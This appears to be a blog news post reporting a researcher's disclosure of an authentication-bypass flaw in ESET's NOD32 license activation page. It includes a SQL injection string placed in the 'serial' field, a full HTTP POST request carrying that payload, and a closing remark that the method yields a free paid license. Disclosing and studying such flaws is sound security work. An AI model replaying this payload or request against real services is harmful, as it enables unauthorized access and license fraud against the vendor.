ESET Free Purchase Vulnerability

ESET vulnerability has been uncovered by Egyptian geeks. This authentication bug allowed a security researcher to generate millions of valid licenses for NOD 32 antivirus – major product of ESET, for FREE.

How Are Authentication Bugs Used?

There are many applications that require from user to authenticate in order to get access to information or gain additional permissions,  but some of the authentication methods are less secure than others. The latter allows users to bypass security by simply jumping from log in page to a backend location that is thought to be accessed only by successful authentication. Some hackers trick application into thinking that they have passed authentication levels and are allowed to access an application, by making changes in URL, sessions or forms.

(SDLC) Software Development Life Cycle authentication problems might reside in Design, Development or Deployment. One can bypass authentication method by following methods:

  • SQL Injection
  • Session ID guessing
  • Direct Page Request
  • Modification of Parameters

Security researcher published details about exploiting this vulnerability:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service:
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

By using above mentioned method one will get a free paid license of ESET Nod32 Antivirus valid for 365 Days! Such license costs 29$ on official ESET Store.

 

 Image Courtesy of Hit2k

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.